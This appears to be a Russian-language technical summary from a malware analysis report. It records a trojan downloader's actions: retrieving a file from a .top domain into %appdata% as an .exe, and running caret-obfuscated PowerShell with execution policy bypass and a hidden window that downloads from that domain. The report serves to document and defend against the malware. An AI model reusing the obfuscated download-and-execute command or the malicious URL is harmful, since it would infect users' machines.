Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoW^eRSH^eLL^.EXE^ -^exe^C^Uti^ON^pOLiCY^ bYPa^S^S -^No^prOfI^l^e -WinDows^t^yl^e^ hID^De^n^ (^New-oB^jeC^t^ ^SysTeM.n^ET^.wE^b^cli^EnT^).DOWn^lOAdFI^le('http://zofe...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PoW^eRSH^eLL^.EXE^ -^exe^C^Uti^ON^pOLiCY^ bYPa^S^S -^No^prOfI^l^e -WinDows^t^yl^e^ hID^De^n^ (^New-oB^jeC^t^ ^SysTeM.n^ET^.wE^b^cli^EnT^).DOWn^lOAdFI^le('http://zofe...' (со скрытым окном)